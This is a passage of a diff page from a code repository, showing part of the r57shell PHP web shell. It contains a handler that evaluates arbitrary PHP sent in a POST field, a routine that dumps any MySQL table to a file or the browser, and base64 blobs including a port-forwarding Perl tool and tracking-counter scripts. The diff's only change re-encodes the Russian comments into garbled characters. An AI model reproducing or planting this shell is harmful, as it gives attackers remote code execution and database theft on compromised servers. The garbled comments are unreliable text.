1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
|
||||||
/* --- END datapipe.pl ----------------------------------------------------------------------------------------- */
|
/* --- END datapipe.pl ----------------------------------------------------------------------------------------- */
|
||||||
$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
|
|
||||||
JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
|
|
||||||
lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
|
|
||||||
FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
|
|
||||||
3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
|
|
||||||
J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
|
|
||||||
oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
|
|
||||||
xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
|
|
||||||
i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
|
|
||||||
dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
|
|
||||||
ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
|
|
||||||
hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
|
|
||||||
$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
|
|
||||||
IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
|
|
||||||
hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
|
|
||||||
tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
|
|
||||||
XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
|
|
||||||
8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
|
|
||||||
ybmV0LS0+";
|
|
||||||
/*** END base64 ------------------------------------------------------------------------------------------------ */
|
/*** END base64 ------------------------------------------------------------------------------------------------ */
|
||||||
|
|
||||||
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
|
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
|
||||||
|
@ -1468,7 +1450,7 @@ else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump"))
|
||||||
|
|
||||||
}
|
}
|
||||||
|
|
||||||
// не зависит от сейфа
|
// íå çàâèñèò îò ñåéôà
|
||||||
if ($_POST['cmd']=="php_eval")
|
if ($_POST['cmd']=="php_eval")
|
||||||
{
|
{
|
||||||
$eval = @str_replace("<?","",$_POST['php_eval']);
|
$eval = @str_replace("<?","",$_POST['php_eval']);
|
||||||
|
@ -1476,7 +1458,7 @@ if ($_POST['cmd']=="php_eval")
|
||||||
@eval($eval);
|
@eval($eval);
|
||||||
}
|
}
|
||||||
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
|
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
|
||||||
/* mysql дамп */
|
/* mysql äàìï */
|
||||||
if ($_POST['cmd']=="mysql_dump")
|
if ($_POST['cmd']=="mysql_dump")
|
||||||
{
|
{
|
||||||
if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
|
if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
|
||||||
|
@ -1487,7 +1469,7 @@ if ($_POST['cmd']=="mysql_dump")
|
||||||
|
|
||||||
if(@mysql_select_db($_POST['mysql_db'],$db))
|
if(@mysql_select_db($_POST['mysql_db'],$db))
|
||||||
{
|
{
|
||||||
// инфа о дампе
|
// èíôà î äàìïå
|
||||||
$sql1 = "# MySQL dump created by r57shell\r\n";
|
$sql1 = "# MySQL dump created by r57shell\r\n";
|
||||||
$sql1 .= "# homepage: http://rst.void.ru\r\n";
|
$sql1 .= "# homepage: http://rst.void.ru\r\n";
|
||||||
$sql1 .= "# ---------------------------------\r\n";
|
$sql1 .= "# ---------------------------------\r\n";
|
||||||
|
@ -1496,7 +1478,7 @@ if ($_POST['cmd']=="mysql_dump")
|
||||||
$sql1 .= "# table : ".$_POST['mysql_tbl']."\r\n";
|
$sql1 .= "# table : ".$_POST['mysql_tbl']."\r\n";
|
||||||
$sql1 .= "# ---------------------------------\r\n\r\n";
|
$sql1 .= "# ---------------------------------\r\n\r\n";
|
||||||
|
|
||||||
// получаем текст запроса создания структуры таблицы
|
// ïîëó÷àåì òåêñò çàïðîñà ñîçäàíèÿ ñòðóêòóðû òàáëèöû
|
||||||
$res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
|
$res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
|
||||||
$row = @mysql_fetch_row($res);
|
$row = @mysql_fetch_row($res);
|
||||||
$sql1 .= $row[1]."\r\n\r\n";
|
$sql1 .= $row[1]."\r\n\r\n";
|
||||||
|
@ -1504,7 +1486,7 @@ if ($_POST['cmd']=="mysql_dump")
|
||||||
|
|
||||||
$sql2 = '';
|
$sql2 = '';
|
||||||
|
|
||||||
// получаем данные таблицы
|
// ïîëó÷àåì äàííûå òàáëèöû
|
||||||
$res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
|
$res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
|
||||||
if (@mysql_num_rows($res) > 0) {
|
if (@mysql_num_rows($res) > 0) {
|
||||||
while ($row = @mysql_fetch_assoc($res)) {
|
while ($row = @mysql_fetch_assoc($res)) {
|
||||||
|
@ -1516,7 +1498,7 @@ if ($_POST['cmd']=="mysql_dump")
|
||||||
}
|
}
|
||||||
$sql2 .= "\r\n# ---------------------------------";
|
$sql2 .= "\r\n# ---------------------------------";
|
||||||
}
|
}
|
||||||
// пишем в файл или выводим в браузер
|
// ïèøåì â ôàéë èëè âûâîäèì â áðàóçåð
|
||||||
if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
|
if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
|
||||||
else { echo $sql1.$sql2; }
|
else { echo $sql1.$sql2; }
|
||||||
} // end if(@mysql_select_db($_POST['mysql_db'],$db))
|
} // end if(@mysql_select_db($_POST['mysql_db'],$db))
|
||||||
|
|
Loading…
Reference in a new issue